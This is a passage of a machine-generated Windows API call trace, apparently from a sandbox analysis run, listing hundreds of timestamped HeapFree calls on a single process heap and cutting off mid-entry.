HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2821070 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2834280 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2847490 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x285a6a0 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x286d8b0 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2880ac0 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2893cd0 | out: hHeap=0x4e0000) returned 1 [0241.212] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x28a6ee0 | out: hHeap=0x4e0000) returned 1 [0241.212] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x28ba0f0 | out: hHeap=0x4e0000) returned 1 [0241.212] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x28cd300 | out: hHeap=0x4e0000) returned 1 [0241.212] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x28e0510 | out: hHeap=0x4e0000) returned 1 [0241.218] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x28f3720 | out: hHeap=0x4e0000) returned 1 [0241.218] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2906930 | out: hHeap=0x4e0000) returned 1 [0241.218] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2919b40 | out: hHeap=0x4e0000) returned 1 [0241.218] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x292cd50 | out: hHeap=0x4e0000) returned 1 [0241.220] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x293ff60 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2953170 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2966380 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2979590 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x298c7a0 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x299f9b0 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x29b2bc0 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x29c5dd0 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x29d8fe0 | out: hHeap=0x4e0000) returned 1 [0241.221] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x29ec1f0 | out: hHeap=0x4e0000) returned 1 [0241.227] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x29ff400 | out: hHeap=0x4e0000) returned 1 [0241.227] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a12610 | out: hHeap=0x4e0000) returned 1 [0241.227] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a25820 | out: hHeap=0x4e0000) returned 1 [0241.227] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a38a30 | out: hHeap=0x4e0000) returned 1 [0241.227] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a4bc40 | out: hHeap=0x4e0000) returned 1 [0241.485] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a5ee50 | out: hHeap=0x4e0000) returned 1 [0241.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a72060 | out: hHeap=0x4e0000) returned 1 [0241.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a85270 | out: hHeap=0x4e0000) returned 1 [0241.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2a98480 | out: hHeap=0x4e0000) returned 1 [0241.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2aab690 | out: hHeap=0x4e0000) returned 1 [0241.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2abe8a0 | out: hHeap=0x4e0000) returned 1 [0241.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ad1ab0 | out: hHeap=0x4e0000) returned 1 [0241.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ae4cc0 | out: hHeap=0x4e0000) returned 1 [0241.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2af7ed0 | out: hHeap=0x4e0000) returned 1 [0241.494] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b0b0e0 | out: hHeap=0x4e0000) returned 1 [0241.494] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b1e2f0 | out: hHeap=0x4e0000) returned 1 [0241.494] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b31500 | out: hHeap=0x4e0000) returned 1 [0241.494] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b44710 | out: hHeap=0x4e0000) returned 1 [0241.494] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b57920 | out: hHeap=0x4e0000) returned 1 [0241.494] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b6ab30 | out: hHeap=0x4e0000) returned 1 [0241.497] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b7dd40 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2b90f50 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ba4160 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2bb7370 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2bca580 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2bdd790 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2bf09a0 | out: hHeap=0x4e0000) returned 1 [0241.498] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c03bb0 | out: hHeap=0x4e0000) returned 1 [0241.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c16dc0 | out: hHeap=0x4e0000) returned 1 [0241.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c29fd0 | out: hHeap=0x4e0000) returned 1 [0241.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c3d1e0 | out: hHeap=0x4e0000) returned 1 [0241.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c503f0 | out: hHeap=0x4e0000) returned 1 [0241.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c63600 | out: hHeap=0x4e0000) returned 1 [0241.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c76810 | out: hHeap=0x4e0000) returned 1 [0241.506] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c89a20 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2c9cc30 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2cafe40 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2cc3050 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2cd6260 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ce9470 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2cfc680 | out: hHeap=0x4e0000) returned 1 [0241.508] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d0f890 | out: hHeap=0x4e0000) returned 1 [0241.513] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d22aa0 | out: hHeap=0x4e0000) returned 1 [0241.513] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d35cb0 | out: hHeap=0x4e0000) returned 1 [0241.513] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d48ec0 | out: hHeap=0x4e0000) returned 1 [0241.513] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d5c0d0 | out: hHeap=0x4e0000) returned 1 [0241.513] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d6f2e0 | out: hHeap=0x4e0000) returned 1 [0241.516] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d824f0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d95700 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2da8910 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2dd0080 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2de3290 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2df64a0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e096b0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e1c8c0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e2fad0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e42ce0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e55ef0 | out: hHeap=0x4e0000) returned 1 [0241.517] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e69100 | out: hHeap=0x4e0000) returned 1 [0241.804] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e7c310 | out: hHeap=0x4e0000) returned 1 [0241.806] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2e8f520 | out: hHeap=0x4e0000) returned 1 [0241.806] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ea2730 | out: hHeap=0x4e0000) returned 1 [0241.806] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2eb5940 | out: hHeap=0x4e0000) returned 1 [0241.806] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ec8b50 | out: hHeap=0x4e0000) returned 1 [0241.809] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2edbd60 | out: hHeap=0x4e0000) returned 1 [0241.809] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2eeef70 | out: hHeap=0x4e0000) returned 1 [0241.809] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f02180 | out: hHeap=0x4e0000) returned 1 [0241.809] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f15390 | out: hHeap=0x4e0000) returned 1 [0241.810] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f285a0 | out: hHeap=0x4e0000) returned 1 [0241.810] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f3b7b0 | out: hHeap=0x4e0000) returned 1 [0241.812] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f4e9c0 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f61bd0 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f74de0 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f87ff0 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2f9b200 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2fae410 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2fc1620 | out: hHeap=0x4e0000) returned 1 [0241.814] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2fd4830 | out: hHeap=0x4e0000) returned 1 [0241.819] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2fe7a40 | out: hHeap=0x4e0000) returned 1 [0241.819] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2ffac50 | out: hHeap=0x4e0000) returned 1 [0241.819] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x300de60 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3021070 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3034280 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3047490 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x305a6a0 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x306d8b0 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3080ac0 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3093cd0 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x30a6ee0 | out: hHeap=0x4e0000) returned 1 [0241.820] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x30ba0f0 | out: hHeap=0x4e0000) returned 1 [0241.824] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x30cd300 | out: hHeap=0x4e0000) returned 1 [0241.832] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x30e0510 | out: hHeap=0x4e0000) returned 1 [0241.836] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x30f3720 | out: hHeap=0x4e0000) returned 1 [0241.837] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3106930 | out: hHeap=0x4e0000) returned 1 [0241.837] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3119b40 | out: hHeap=0x4e0000) returned 1 [0241.837] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x312cd50 | out: hHeap=0x4e0000) returned 1 [0241.837] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x313ff60 | out: hHeap=0x4e0000) returned 1 [0241.837] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3153170 | out: hHeap=0x4e0000) returned 1 [0241.837] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3166380 | out: hHeap=0x4e0000) returned 1 [0242.037] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3179590 | out: hHeap=0x4e0000) returned 1 [0242.038] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x318c7a0 | out: hHeap=0x4e0000) returned 1 [0242.039] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x319f9b0 | out: hHeap=0x4e0000) returned 1 [0242.039] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x31b2bc0 | out: hHeap=0x4e0000) returned 1 [0242.039] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x31c5dd0 | out: hHeap=0x4e0000) returned 1 [0242.039] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x31d8fe0 | out: hHeap=0x4e0000) returned 1 [0242.039] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x31ec1f0 | out: hHeap=0x4e0000) returned 1 [0242.042] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x31ff400 | out: hHeap=0x4e0000) returned 1 [0242.042] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3212610 | out: hHeap=0x4e0000) returned 1 [0242.043] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3225820 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3238a30 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x324bc40 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x325ee50 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3272060 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3285270 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3298480 | out: hHeap=0x4e0000) returned 1 [0242.044] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x32ab690 | out: hHeap=0x4e0000) returned 1 [0242.048] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x32be8a0 | out: hHeap=0x4e0000) returned 1 [0242.050] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x32d1ab0 | out: hHeap=0x4e0000) returned 1 [0242.050] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x32e4cc0 | out: hHeap=0x4e0000) returned 1 [0242.050] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x32f7ed0 | out: hHeap=0x4e0000) returned 1 [0242.053] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x330b0e0 | out: hHeap=0x4e0000) returned 1 [0242.053] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x331e2f0 | out: hHeap=0x4e0000) returned 1 [0242.053] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3331500 | out: hHeap=0x4e0000) returned 1 [0242.053] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3344710 | out: hHeap=0x4e0000) returned 1 [0242.055] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3357920 | out: hHeap=0x4e0000) returned 1 [0242.055] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x336ab30 | out: hHeap=0x4e0000) returned 1 [0242.055] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x337dd40 | out: hHeap=0x4e0000) returned 1 [0242.055] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3390f50 | out: hHeap=0x4e0000) returned 1 [0242.056] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x33a4160 | out: hHeap=0x4e0000) returned 1 [0242.056] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x33b7370 | out: hHeap=0x4e0000) returned 1 [0242.056] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x33ca580 | out: hHeap=0x4e0000) returned 1 [0242.059] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x33dd790 | out: hHeap=0x4e0000) returned 1 [0242.061] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x33f09a0 | out: hHeap=0x4e0000) returned 1 [0242.061] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3403bb0 | out: hHeap=0x4e0000) returned 1 [0242.064] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3416dc0 | out: hHeap=0x4e0000) returned 1 [0242.064] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3429fd0 | out: hHeap=0x4e0000) returned 1 [0242.064] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x343d1e0 | out: hHeap=0x4e0000) returned 1 [0242.064] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x34503f0 | out: hHeap=0x4e0000) returned 1 [0242.066] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3463600 | out: hHeap=0x4e0000) returned 1 [0242.067] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3476810 | out: hHeap=0x4e0000) returned 1 [0242.067] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3489a20 | out: hHeap=0x4e0000) returned 1 [0242.067] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x349cc30 | out: hHeap=0x4e0000) returned 1 [0242.067] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x34afe40 | out: hHeap=0x4e0000) returned 1 [0242.067] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x34c3050 | out: hHeap=0x4e0000) returned 1 [0242.070] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x34d6260 | out: hHeap=0x4e0000) returned 1 [0242.420] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x34e9470 | out: hHeap=0x4e0000) returned 1 [0242.420] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x34fc680 | out: hHeap=0x4e0000) returned 1 [0242.420] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x350f890 | out: hHeap=0x4e0000) returned 1 [0242.424] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3522aa0 | out: hHeap=0x4e0000) returned 1 [0242.424] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3535cb0 | out: hHeap=0x4e0000) returned 1 [0242.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3548ec0 | out: hHeap=0x4e0000) returned 1 [0242.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x355c0d0 | out: hHeap=0x4e0000) returned 1 [0242.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x356f2e0 | out: hHeap=0x4e0000) returned 1 [0242.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x35824f0 | out: hHeap=0x4e0000) returned 1 [0242.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3595700 | out: hHeap=0x4e0000) returned 1 [0242.428] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x35a8910 | out: hHeap=0x4e0000) returned 1 [0242.430] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x35bbb20 | out: hHeap=0x4e0000) returned 1 [0242.430] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x35ced30 | out: hHeap=0x4e0000) returned 1 [0242.430] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x35e1f40 | out: hHeap=0x4e0000) returned 1 [0242.430] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x35f5150 | out: hHeap=0x4e0000) returned 1 [0242.434] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3608360 | out: hHeap=0x4e0000) returned 1 [0242.436] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x361b570 | out: hHeap=0x4e0000) returned 1 [0242.438] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x362e780 | out: hHeap=0x4e0000) returned 1 [0242.439] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3641990 | out: hHeap=0x4e0000) returned 1 [0242.439] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3654ba0 | out: hHeap=0x4e0000) returned 1 [0242.440] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3667db0 | out: hHeap=0x4e0000) returned 1 [0242.441] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x367afc0 | out: hHeap=0x4e0000) returned 1 [0242.441] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x368e1d0 | out: hHeap=0x4e0000) returned 1 [0242.441] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x36a13e0 | out: hHeap=0x4e0000) returned 1 [0242.441] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x36b45f0 | out: hHeap=0x4e0000) returned 1 [0242.443] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x36c7800 | out: hHeap=0x4e0000) returned 1 [0242.445] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x36daa10 | out: hHeap=0x4e0000) returned 1 [0242.445] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x36edc20 | out: hHeap=0x4e0000) returned 1 [0242.445] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3700e30 | out: hHeap=0x4e0000) returned 1 [0242.448] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3714040 | out: hHeap=0x4e0000) returned 1 [0242.450] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3727250 | out: hHeap=0x4e0000) returned 1 [0242.453] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x373a460 | out: hHeap=0x4e0000) returned 1 [0242.453] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x374d670 | out: hHeap=0x4e0000) returned 1 [0242.454] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3760880 | out: hHeap=0x4e0000) returned 1 [0242.454] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3773a90 | out: hHeap=0x4e0000) returned 1 [0242.454] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3786ca0 | out: hHeap=0x4e0000) returned 1 [0242.454] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3799eb0 | out: hHeap=0x4e0000) returned 1 [0242.641] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x37ad0c0 | out: hHeap=0x4e0000) returned 1 [0242.647] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x37c02d0 | out: hHeap=0x4e0000) returned 1 [0242.647] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x37d34e0 | out: hHeap=0x4e0000) returned 1 [0242.649] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x37e66f0 | out: hHeap=0x4e0000) returned 1 [0242.651] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x37f9900 | out: hHeap=0x4e0000) returned 1 [0242.651] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x380cb10 | out: hHeap=0x4e0000) returned 1 [0242.655] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x381fd20 | out: hHeap=0x4e0000) returned 1 [0242.658] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3832f30 | out: hHeap=0x4e0000) returned 1 [0242.661] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3846140 | out: hHeap=0x4e0000) returned 1 [0242.662] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3859350 | out: hHeap=0x4e0000) returned 1 [0242.662] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x386c560 | out: hHeap=0x4e0000) returned 1 [0242.662] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x387f770 | out: 